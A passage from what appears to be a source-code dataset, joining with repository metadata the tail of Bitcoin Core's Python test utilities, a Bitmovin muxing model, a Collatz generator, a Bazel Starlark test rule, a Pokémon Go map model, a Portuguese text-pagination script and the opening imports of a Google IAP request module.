raise AssertionError("Expected substring not found:" + e.error['message'])
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
raise AssertionError("No exception raised")
def assert_raises_process_error(returncode, output, fun, *args, **kwds):
"""Execute a process and asserts the process return code and output.
Calls function `fun` with arguments `args` and `kwds`. Catches a CalledProcessError
and verifies that the return code and output are as expected. Throws AssertionError if
no CalledProcessError was raised or if the return code and output are not as expected.
Args:
returncode (int): the process return code.
output (string): [a substring of] the process output.
fun (function): the function to call. This should execute a process.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
try:
fun(*args, **kwds)
except CalledProcessError as e:
if returncode != e.returncode:
raise AssertionError("Unexpected returncode %i" % e.returncode)
if output not in e.output:
raise AssertionError("Expected substring not found:" + e.output)
else:
raise AssertionError("No exception raised")
def assert_raises_rpc_error(code, message, fun, *args, **kwds):
"""Run an RPC and verify that a specific JSONRPC exception code and message is raised.
Calls function `fun` with arguments `args` and `kwds`. Catches a JSONRPCException
and verifies that the error code and message are as expected. Throws AssertionError if
no JSONRPCException was raised or if the error code/message are not as expected.
Args:
code (int), optional: the error code returned by the RPC call (defined
in src/rpc/protocol.h). Set to None if checking the error code is not required.
message (string), optional: [a substring of] the error string returned by the
RPC call. Set to None if checking the error string is not required.
fun (function): the function to call. This should be the name of an RPC.
args*: positional arguments for the function.
kwds**: named arguments for the function.
"""
assert try_rpc(code, message, fun, *args, **kwds), "No exception raised"
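# Illustrative usage sketch (not part of the original module): verify that an RPC
# call fails with the expected JSON-RPC error. The `node` proxy and the exact
# code/message pair below are assumptions made for the example only.
def _example_assert_raises_rpc_error(node):
    assert_raises_rpc_error(-8, "Block height out of range", node.getblockhash, 10**9)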
def try_rpc(code, message, fun, *args, **kwds):
"""Tries to run an rpc command.
Test against error code and message if the rpc fails.
Returns whether a JSONRPCException was raised."""
try:
fun(*args, **kwds)
except JSONRPCException as e:
# JSONRPCException was thrown as expected. Check the code and message values are correct.
if (code is not None) and (code != e.error["code"]):
raise AssertionError("Unexpected JSONRPC error code %i" % e.error["code"])
if (message is not None) and (message not in e.error['message']):
raise AssertionError("Expected substring not found:" + e.error['message'])
return True
except Exception as e:
raise AssertionError("Unexpected exception raised: " + type(e).__name__)
else:
return False
def assert_is_hex_string(string):
try:
int(string, 16)
except Exception as e:
raise AssertionError(
"Couldn't interpret %r as hexadecimal; raised: %s" % (string, e))
def assert_is_hash_string(string, length=64):
if not isinstance(string, str):
raise AssertionError("Expected a string, got type %r" % type(string))
elif length and len(string) != length:
raise AssertionError(
"String of length %d expected; got %d" % (length, len(string)))
elif not re.match('[abcdef0-9]+$', string):
raise AssertionError(
"String %r contains invalid characters for a hash." % string)
def assert_array_result(object_array, to_match, expected, should_not_find=False):
"""
Pass in array of JSON objects, a dictionary with key/value pairs
to match against, and another dictionary with expected key/value
pairs.
If the should_not_find flag is true, to_match should not be found
in object_array
"""
if should_not_find:
assert_equal(expected, {})
num_matched = 0
for item in object_array:
all_match = True
for key, value in to_match.items():
if item[key] != value:
all_match = False
if not all_match:
continue
elif should_not_find:
num_matched = num_matched + 1
for key, value in expected.items():
if item[key] != value:
raise AssertionError("%s : expected %s=%s" % (str(item), str(key), str(value)))
num_matched = num_matched + 1
if num_matched == 0 and not should_not_find:
raise AssertionError("No objects matched %s" % (str(to_match)))
if num_matched > 0 and should_not_find:
raise AssertionError("Objects were found %s" % (str(to_match)))
# Utility functions
###################
def check_json_precision():
"""Make sure json library being used does not lose precision converting BTC values"""
n = Decimal("20000000.00000003")
satoshis = int(json.loads(json.dumps(float(n))) * 1.0e8)
if satoshis != 2000000000000003:
raise RuntimeError("JSON encode/decode loses precision")
def count_bytes(hex_string):
return len(bytearray.fromhex(hex_string))
def hex_str_to_bytes(hex_str):
return unhexlify(hex_str.encode('ascii'))
def str_to_b64str(string):
return b64encode(string.encode('utf-8')).decode('ascii')
def satoshi_round(amount):
return Decimal(amount).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
def wait_until(predicate, *, attempts=float('inf'), timeout=float('inf'), lock=None):
if attempts == float('inf') and timeout == float('inf'):
timeout = 60
attempt = 0
time_end = time.time() + timeout
while attempt < attempts and time.time() < time_end:
if lock:
with lock:
if predicate():
return
else:
if predicate():
return
attempt += 1
time.sleep(0.05)
# Print the cause of the timeout
predicate_source = "''''\n" + inspect.getsource(predicate) + "'''"
logger.error("wait_until() failed. Predicate: {}".format(predicate_source))
if attempt >= attempts:
raise AssertionError("Predicate {} not true after {} attempts".format(predicate_source, attempts))
elif time.time() >= time_end:
raise AssertionError("Predicate {} not true after {} seconds".format(predicate_source, timeout))
raise RuntimeError('Unreachable')
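# Illustrative usage sketch (not part of the original module): poll until a node's
# mempool contains a given txid, giving up after 30 seconds. `node` and `txid`
# are assumptions made for the example only.
def _example_wait_until(node, txid):
    wait_until(lambda: txid in node.getrawmempool(), timeout=30)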
# RPC/P2P connection constants and functions
############################################
# The maximum number of nodes a single test can spawn
MAX_NODES = 4
# Don't assign rpc or p2p ports lower than this
PORT_MIN = 11000
# The number of ports to "reserve" for p2p and rpc, each
PORT_RANGE = 5000
class PortSeed:
# Must be initialized with a unique integer for each process
n = None
def get_rpc_proxy(url, node_number, timeout=None, coveragedir=None):
"""
Args:
url (str): URL of the RPC server to call
node_number (int): the node number (or id) that this calls to
Kwargs:
timeout (int): HTTP timeout in seconds
Returns:
AuthServiceProxy. convenience object for making RPC calls.
"""
proxy_kwargs = {}
if timeout is not None:
proxy_kwargs['timeout'] = timeout
proxy = AuthServiceProxy(url, **proxy_kwargs)
proxy.url = url # store URL on proxy for info
coverage_logfile = coverage.get_filename(
coveragedir, node_number) if coveragedir else None
return coverage.AuthServiceProxyWrapper(proxy, coverage_logfile)
def p2p_port(n):
assert n <= MAX_NODES
return PORT_MIN + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
def rpc_port(n):
return PORT_MIN + PORT_RANGE + n + (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES)
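# Worked example (not part of the original module): with PortSeed.n = 1 the offset
# (MAX_NODES * PortSeed.n) % (PORT_RANGE - 1 - MAX_NODES) is 4, so node 0 gets
# p2p port 11000 + 0 + 4 = 11004 and rpc port 11000 + 5000 + 0 + 4 = 16004; a
# different seed shifts both ports so parallel test runs do not collide.
def _example_ports():
    PortSeed.n = 1
    return p2p_port(0), rpc_port(0)  # (11004, 16004) under the assumption above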
def rpc_url(datadir, i, chain, rpchost):
rpc_u, rpc_p = get_auth_cookie(datadir, chain)
host = '127.0.0.1'
port = rpc_port(i)
if rpchost:
parts = rpchost.split(':')
if len(parts) == 2:
host, port = parts
else:
host = rpchost
return "http://%s:%s@%s:%d" % (rpc_u, rpc_p, host, int(port))
# Node functions
################
def initialize_datadir(dirname, n, chain):
datadir = get_datadir_path(dirname, n)
if not os.path.isdir(datadir):
os.makedirs(datadir)
with open(os.path.join(datadir, "bitcoin.conf"), 'w', encoding='utf8') as f:
f.write("{}=1\n".format(chain))
f.write("[{}]\n".format(chain))
f.write("port=" + str(p2p_port(n)) + "\n")
f.write("rpcport=" + str(rpc_port(n)) + "\n")
f.write("server=1\n")
f.write("keypool=1\n")
f.write("discover=0\n")
f.write("listenonion=0\n")
f.write("printtoconsole=0\n")
f.write("upnp=0\n")
os.makedirs(os.path.join(datadir, 'stderr'), exist_ok=True)
os.makedirs(os.path.join(datadir, 'stdout'), exist_ok=True)
return datadir
def get_datadir_path(dirname, n):
return os.path.join(dirname, "node" + str(n))
def append_config(datadir, options):
with open(os.path.join(datadir, "bitcoin.conf"), 'a', encoding='utf8') as f:
for option in options:
f.write(option + "\n")
def get_auth_cookie(datadir, chain):
user = None
password = None
if os.path.isfile(os.path.join(datadir, "bitcoin.conf")):
with open(os.path.join(datadir, "bitcoin.conf"), 'r', encoding='utf8') as f:
for line in f:
if line.startswith("rpcuser="):
assert user is None # Ensure that there is only one rpcuser line
user = line.split("=")[1].strip("\n")
if line.startswith("rpcpassword="):
assert password is None # Ensure that there is only one rpcpassword line
password = line.split("=")[1].strip("\n")
try:
with open(os.path.join(datadir, chain, ".cookie"), 'r', encoding="ascii") as f:
userpass = f.read()
split_userpass = userpass.split(':')
user = split_userpass[0]
password = split_userpass[1]
except OSError:
pass
if user is None or password is None:
raise ValueError("No RPC credentials")
return user, password
# If a cookie file exists in the given datadir, delete it.
def delete_cookie_file(datadir, chain):
if os.path.isfile(os.path.join(datadir, chain, ".cookie")):
logger.debug("Deleting leftover cookie file")
os.remove(os.path.join(datadir, chain, ".cookie"))
def softfork_active(node, key):
"""Return whether a softfork is active."""
return node.getblockchaininfo()['softforks'][key]['active']
def set_node_times(nodes, t):
for node in nodes:
node.setmocktime(t)
def disconnect_nodes(from_connection, node_num):
for peer_id in [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']]:
try:
from_connection.disconnectnode(nodeid=peer_id)
except JSONRPCException as e:
# If this node is disconnected between calculating the peer id
# and issuing the disconnect, don't worry about it.
# This avoids a race condition if we're mass-disconnecting peers.
if e.error['code'] != -29: # RPC_CLIENT_NODE_NOT_CONNECTED
raise
# wait to disconnect
wait_until(lambda: [peer['id'] for peer in from_connection.getpeerinfo() if "testnode%d" % node_num in peer['subver']] == [], timeout=5)
def connect_nodes(from_connection, node_num):
ip_port = "127.0.0.1:" + str(p2p_port(node_num))
from_connection.addnode(ip_port, "onetry")
# poll until version handshake complete to avoid race conditions
# with transaction relaying
wait_until(lambda: all(peer['version'] != 0 for peer in from_connection.getpeerinfo()))
def connect_nodes_bi(nodes, a, b):
connect_nodes(nodes[a], b)
connect_nodes(nodes[b], a)
def sync_blocks(rpc_connections, *, wait=1, timeout=60):
"""
Wait until everybody has the same tip.
sync_blocks needs to be called with an rpc_connections set that has least
one node already synced to the latest, stable tip, otherwise there's a
chance it might return before all nodes are stably synced.
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
best_hash = [x.getbestblockhash() for x in rpc_connections]
if best_hash.count(best_hash[0]) == len(rpc_connections):
return
time.sleep(wait)
raise AssertionError("Block sync timed out:{}".format("".join("\n {!r}".format(b) for b in best_hash)))
def sync_mempools(rpc_connections, *, wait=1, timeout=60, flush_scheduler=True):
"""
Wait until everybody has the same transactions in their memory
pools
"""
stop_time = time.time() + timeout
while time.time() <= stop_time:
pool = [set(r.getrawmempool()) for r in rpc_connections]
if pool.count(pool[0]) == len(rpc_connections):
if flush_scheduler:
for r in rpc_connections:
r.syncwithvalidationinterfacequeue()
return
time.sleep(wait)
raise AssertionError("Mempool sync timed out:{}".format("".join("\n {!r}".format(m) for m in pool)))
# Transaction/Block functions
#############################
def find_output(node, txid, amount, *, blockhash=None):
"""
Return index to output of txid with value amount
Raises exception if there is none.
"""
txdata = node.getrawtransaction(txid, 1, blockhash)
for i in range(len(txdata["vout"])):
if txdata["vout"][i]["value"] == amount:
return i
raise RuntimeError("find_output txid %s : %s not found" % (txid, str(amount)))
def gather_inputs(from_node, amount_needed, confirmations_required=1):
"""
Return a random set of unspent txouts that are enough to pay amount_needed
"""
assert confirmations_required >= 0
utxo = from_node.listunspent(confirmations_required)
random.shuffle(utxo)
inputs = []
total_in = Decimal("0.00000000")
while total_in < amount_needed and len(utxo) > 0:
t = utxo.pop()
total_in += t["amount"]
inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
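# Illustrative sketch (not part of the original module): with amount_in = 10,
# amount_out = 2 and fee = 0.001, the change of 7.999 exceeds twice the amount
# spent, so make_change returns two change outputs of roughly 3.9995 each. The
# stub node and its addresses are made up for the example.
def _example_make_change():
    class _StubNode:
        def __init__(self):
            self._addrs = iter(["addr_change_1", "addr_change_2"])
        def getnewaddress(self):
            return next(self._addrs)
    return make_change(_StubNode(), Decimal("10"), Decimal("2"), Decimal("0.001"))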
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransactionwithwallet(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], 0)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = satoshi_round(send_value / 2)
outputs[addr2] = satoshi_round(send_value / 2)
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransactionwithwallet(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert len(utxos) >= count
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = []
from .messages import CTxOut
txout = CTxOut()
txout.nValue = 0
txout.scriptPubKey = hex_str_to_bytes(script_pubkey)
for k in range(128):
txouts.append(txout)
return txouts
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
from .messages import CTransaction
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = satoshi_round(change)
rawtx = node.createrawtransaction(inputs, outputs)
tx = CTransaction()
tx.deserialize(BytesIO(hex_str_to_bytes(rawtx)))
for txout in txouts:
tx.vout.append(txout)
newtx = tx.serialize().hex()
signresult = node.signrawtransactionwithwallet(newtx, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], 0)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
    # generate ~66 kB transactions,
    # and 14 of them together come close to the 1 MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
def find_vout_for_address(node, txid, addr):
"""
Locate the vout index of the given transaction sending to the
given address. Raises runtime error exception if not found.
"""
tx = node.getrawtransaction(txid, True)
for i in range(len(tx["vout"])):
if any([addr == a for a in tx["vout"][i]["scriptPubKey"]["addresses"]]):
return i
raise RuntimeError("Vout not found for address: txid=%s, addr=%s" % (txid, addr))
| 38.820423
| 140
| 0.652063
|
6ebefd751306fd50dad0ec67488574f2f6f6120d
| 4,713
|
py
|
Python
|
bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
bitmovin/resources/models/encodings/muxings/muxing.py
|
camberbridge/bitmovin-python
|
3af4c6e79b0291fda05fd1ceeb5bed1bba9f3c95
|
[
"Unlicense"
] | null | null | null |
from bitmovin.errors import InvalidTypeError
from bitmovin.resources.models import AbstractModel
from bitmovin.resources import AbstractNameDescriptionResource
from bitmovin.resources.models.encodings.encoding_output import EncodingOutput
from bitmovin.resources.models.encodings.ignored_by import IgnoredBy
from bitmovin.utils import Serializable
from .muxing_stream import MuxingStream
class Muxing(AbstractNameDescriptionResource, AbstractModel, Serializable):
def __init__(self, streams, outputs=None, id_=None, custom_data=None, name=None, description=None,
avg_bitrate=None, max_bitrate=None, min_bitrate=None, ignored_by=None):
super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
self._streams = []
self._outputs = None
self._ignoredBy = None
if streams is None or not isinstance(streams, list):
raise InvalidTypeError('streams must be a list')
self.streams = streams
if outputs is not None and not isinstance(outputs, list):
raise InvalidTypeError('outputs must be a list')
self.outputs = outputs
self.avgBitrate = avg_bitrate
self.minBitrate = min_bitrate
self.maxBitrate = max_bitrate
if ignored_by is not None and not isinstance(ignored_by, list):
raise InvalidTypeError('ignoredBy must be a list')
self.ignored_by = ignored_by
@classmethod
def parse_from_json_object(cls, json_object):
id_ = json_object['id']
custom_data = json_object.get('customData')
streams = json_object.get('streams')
outputs = json_object.get('outputs')
name = json_object.get('name')
description = json_object.get('description')
avg_bitrate = json_object.get('avgBitrate')
max_bitrate = json_object.get('maxBitrate')
min_bitrate = json_object.get('minBitrate')
ignored_by = json_object.get('ignoredBy')
muxing = Muxing(id_=id_, custom_data=custom_data, streams=streams, outputs=outputs,
name=name, description=description, avg_bitrate=avg_bitrate, max_bitrate=max_bitrate,
min_bitrate=min_bitrate, ignored_by=ignored_by)
return muxing
@property
def streams(self):
return self._streams
@streams.setter
def streams(self, new_streams):
if new_streams is None:
return
if not isinstance(new_streams, list):
            raise InvalidTypeError('new_streams has to be a list of MuxingStream objects')
if all(isinstance(muxing_stream, MuxingStream) for muxing_stream in new_streams):
self._streams = new_streams
else:
muxing_streams = []
for json_object in new_streams:
muxing_stream = MuxingStream.parse_from_json_object(json_object)
muxing_streams.append(muxing_stream)
self._streams = muxing_streams
@property
def outputs(self):
return self._outputs
@outputs.setter
def outputs(self, new_outputs):
if new_outputs is None:
return
if not isinstance(new_outputs, list):
raise InvalidTypeError('new_outputs has to be a list of EncodingOutput objects')
if all(isinstance(output, EncodingOutput) for output in new_outputs):
self._outputs = new_outputs
else:
outputs = []
for json_object in new_outputs:
output = EncodingOutput.parse_from_json_object(json_object)
outputs.append(output)
self._outputs = outputs
@property
def ignored_by(self):
return self._ignoredBy
@ignored_by.setter
def ignored_by(self, new_ignored_by):
if new_ignored_by is None:
return
if not isinstance(new_ignored_by, list):
raise InvalidTypeError('ignored_by has to be a list of IgnoredBy objects')
if all(isinstance(ignored_by, IgnoredBy) for ignored_by in new_ignored_by):
self._ignoredBy = new_ignored_by
else:
ignored_by_array = []
for json_object in new_ignored_by:
ignored_by_obj = IgnoredBy.parse_from_json_object(json_object)
ignored_by_array.append(ignored_by_obj)
self._ignoredBy = ignored_by_array
def add_stream(self, stream_id):
muxing_stream = MuxingStream(stream_id=stream_id)
self._streams.append(muxing_stream)
def serialize(self):
serialized = super().serialize()
serialized['streams'] = self.streams
serialized['outputs'] = self.outputs
return serialized
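# Illustrative usage sketch (not part of the original module): build a Muxing,
# attach a stream by id and serialize it back to a dict. The stream id is a
# made-up placeholder and serialization is assumed to behave as in AbstractModel.
def _example_muxing():
    muxing = Muxing(streams=[])
    muxing.add_stream('stream-id-placeholder')
    return muxing.serialize()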
| 38.631148
| 109
| 0.669637
|
5559d973b142d27fd090e19f2cc183667397db31
| 188
|
py
|
Python
|
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
src/py/util/collatz.py
|
cgnik/euler
|
fe70459a0e0d0272980300a4782872f2e545fea5
|
[
"MIT"
] | null | null | null |
def collatz(n):
    if n % 2 == 0:
        return n // 2
    return (n * 3) + 1
def collatz_series(n):
a = n
while a != 1:
a = collatz(a)
yield a
return 1
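# Illustrative usage (not part of the original file): starting from 6 the yielded
# sequence is 3, 10, 5, 16, 8, 4, 2, 1; the starting value itself is not yielded.
if __name__ == '__main__':
    print(list(collatz_series(6)))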
| 15.666667
| 25
| 0.452128
|
baf0aa060f2fb2c258269802458a7ebdfa2a97ea
| 1,542
|
bzl
|
Python
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 313
|
2017-03-29T21:47:08.000Z
|
2022-03-29T03:09:50.000Z
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 786
|
2017-03-30T16:15:59.000Z
|
2022-03-31T19:58:05.000Z
|
test/starlark_tests/rules/output_group_test.bzl
|
tnek/rules_apple
|
739aa74febeb95902dded57f7a49c85c1f153756
|
[
"Apache-2.0"
] | 172
|
2017-04-24T01:55:24.000Z
|
2022-03-25T19:23:31.000Z
|
# Copyright 2020 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Starlark test rules for output groups."""
load(
"@bazel_skylib//lib:unittest.bzl",
"analysistest",
"asserts",
)
def _output_group_test_impl(ctx):
"""Implementation of the output_group_test rule."""
env = analysistest.begin(ctx)
target_under_test = ctx.attr.target_under_test
expected_groups = ctx.attr.expected_output_groups
for expected_group in expected_groups:
asserts.true(
env,
expected_group in target_under_test[OutputGroupInfo],
msg = "Expected output group not found\n\n\"{0}\"".format(
expected_group,
),
)
return analysistest.end(env)
output_group_test = analysistest.make(
_output_group_test_impl,
attrs = {
"expected_output_groups": attr.string_list(
mandatory = True,
doc = """List of output groups that should be present in the target.""",
),
},
)
| 31.469388
| 84
| 0.683528
|
d419f911e78c1be8a0cde7b07b12f566eb7e9ee2
| 1,273
|
py
|
Python
|
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | 4
|
2020-04-07T00:38:46.000Z
|
2022-03-10T03:34:42.000Z
|
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | null | null | null |
Cap_9/ex9.8/ex9.8.py
|
gguilherme42/Livro-de-Python
|
465a509d50476fd1a87239c71ed741639d58418b
|
[
"MIT"
] | 1
|
2021-04-22T02:45:38.000Z
|
2021-04-22T02:45:38.000Z
|
import sys
if len(sys.argv) != 3:
    sys.exit('Usage: script.py line_length lines_per_page')
LARGURA = int(sys.argv[1])  # command-line arguments arrive as strings
LINHAS = int(sys.argv[2])
NOME_DO_ARQUIVO = "StuartMill_OnLiberty.txt"
def verifica_pagina(arquivo, linha, pagina):
if(linha == LINHAS):
rodape = f"= {NOME_DO_ARQUIVO} - Página: {pagina} ="
arquivo.write(rodape.center(LARGURA - 1) + "\n")
pagina += 1
linha = 1
return linha, pagina
def escreve(arquivo, linha, nlinhas, pagina):
arquivo.write(linha + "\n")
return verifica_pagina(arquivo, nlinhas+1, pagina)
entrada = open(NOME_DO_ARQUIVO, encoding="utf-8")
saida = open("saida_paginada.txt", "w", encoding="utf-8")
pagina = 1
linhas = 1
for linha in entrada.readlines():
palavras = linha.rstrip().split(" ")
linha = ""
for p in palavras:
p = p.strip()
if (len(linha) + len(p) + 1) > LARGURA:
linhas, pagina=escreve(saida, linha, linhas, pagina)
linha = ""
linha += p + " "
if linha != "":
    linhas, pagina = escreve(saida, linha, linhas, pagina)
# To print the page number on the last page
while linhas != 1:
    linhas, pagina = escreve(saida, "", linhas, pagina)
entrada.close()
saida.close()
| 25.979592
| 64
| 0.627651
|
dc77d36aba2e06a5068c75533c4cc434d016f077
| 3,133
|
py
|
Python
|
api/worldmap.py
|
TilakMaddy/OpenPoGoBot
|
09d11c5349599add5d26518b784d014612adc3d1
|
[
"MIT"
] | 183
|
2016-07-23T22:29:18.000Z
|
2016-09-25T15:39:10.000Z
|
api/worldmap.py
|
OpenPoGo/OpenPoGo
|
02a6c955a36e25f7dd7d325f20ea9d6f5418a911
|
[
"MIT"
] | 354
|
2016-07-23T21:43:27.000Z
|
2016-09-15T21:01:39.000Z
|
api/worldmap.py
|
OpenPoGo/OpenPoGo
|
02a6c955a36e25f7dd7d325f20ea9d6f5418a911
|
[
"MIT"
] | 104
|
2016-07-23T22:28:58.000Z
|
2016-09-09T11:28:01.000Z
|
# pylint: disable=redefined-builtin
from builtins import str
import time
from api.json_encodable import JSONEncodable
class Fort(JSONEncodable):
def __init__(self, data):
self.fort_id = data.get("id", "")
self.fort_name = data.get("name", "Unknown").encode('ascii', 'replace')
# TODO: Make this proper unicode ^^
self.latitude = data.get("latitude", None)
self.longitude = data.get("longitude", None)
self.enabled = data.get("enabled", True)
self.last_modified_timestamp_ms = data.get("last_modified_timestamp_ms", 0)
self.fort_type = data.get("type", 0)
class PokeStop(Fort):
def __init__(self, data):
super(PokeStop, self).__init__(data)
self.active_fort_modifier = data.get("active_fort_modifier", None)
self.cooldown_timestamp_ms = data.get("cooldown_complete_timestamp_ms", None)
lure_info = data.get("lure_info", {})
self.lure_expires_timestamp_ms = lure_info.get("lure_expires_timestamp_ms", None)
self.lure_encounter_id = lure_info.get("encounter_id", None)
self.lure_pokemon_id = lure_info.get("active_pokemon_id", None)
self.lure_fort_id = lure_info.get("fort_id", None)
self.fort_type = 1
def is_lure_active(self):
if self.lure_expires_timestamp_ms is None:
return False
return self.lure_expires_timestamp_ms + 1000 > time.time() * 1000
def is_in_cooldown(self):
if self.cooldown_timestamp_ms is None:
return False
return self.cooldown_timestamp_ms + 1000 > time.time() * 1000
class Gym(Fort):
def __init__(self, data):
super(Gym, self).__init__(data)
        self.is_in_battle = data.get("is_in_battle", 0) == 1
self.guard_pokemon_id = data.get("guard_pokemon_id", None)
self.owned_by_team = data.get("owned_by_team", 0)
self.gym_points = data.get("gym_points", 0)
class Cell(JSONEncodable):
def __init__(self, data):
self.spawn_points = []
self.gyms = []
self.pokestops = []
self.cell_id = data.get("s2_cell_id", 0)
spawn_points = data.get("spawn_points", [])
for spawn in spawn_points:
self.spawn_points.append((spawn["latitude"], spawn["longitude"]))
self.catchable_pokemon = data.get("catchable_pokemons", [])
self.nearby_pokemon = data.get("nearby_pokemons", [])
self.wild_pokemon = data.get("wild_pokemons", [])
forts = data.get("forts", [])
for fort in forts:
if fort.get("type", 0) == 1:
self.pokestops.append(PokeStop(fort))
elif fort.get("type", 0) == 2:
self.gyms.append(Gym(fort))
else:
# Some unknown kind of fort or invalid data
pass
class WorldMap(JSONEncodable):
def __init__(self):
self.cells = []
def update_map_objects(self, data):
cells = data.get("map_cells", [])
for cell_data in cells:
cell = Cell(cell_data)
self.cells.append(cell)
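# Illustrative usage sketch (not part of the original module): feed a minimal
# map_cells payload into WorldMap. Every value below is made up for the example.
def _example_world_map():
    world_map = WorldMap()
    world_map.update_map_objects({
        "map_cells": [{
            "s2_cell_id": 123,
            "forts": [
                {"id": "stop-1", "type": 1, "latitude": 0.0, "longitude": 0.0},
                {"id": "gym-1", "type": 2, "latitude": 0.0, "longitude": 0.0},
            ],
        }]
    })
    return world_map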
| 34.428571
| 89
| 0.622726
|
6f3ae4a21a86e819068db9106ce4b22cd7895e5d
| 3,122
|
py
|
Python
|
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | 3
|
2018-07-18T11:19:37.000Z
|
2019-02-25T19:22:30.000Z
|
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | null | null | null |
pyiap/make_iap_request.py
|
newsdev/nyt-pyiap
|
7b0bdcbe8d0ac4f3c63a65ea069297792c150422
|
[
"Apache-2.0"
] | 3
|
2017-05-30T23:26:08.000Z
|
2020-04-22T15:32:40.000Z
|
import os
import google.auth
import google.auth.app_engine
import google.auth.compute_engine.credentials
import google.auth.iam
from google.auth.transport.requests import Request
import google.oauth2.credentials
import google.oauth2.service_account
from google.oauth2 import service_account
import requests
import requests_toolbelt.adapters.appengine
from six.moves import urllib_parse as urlparse
GCP_SECRETS = os.environ.get('GCP_SERVICE_WORKER_CREDS', '/tmp/gcp-service-worker-creds.json')
IAM_SCOPE = os.environ.get('GCP_IAM_SCOPE', 'https://www.googleapis.com/auth/iam')
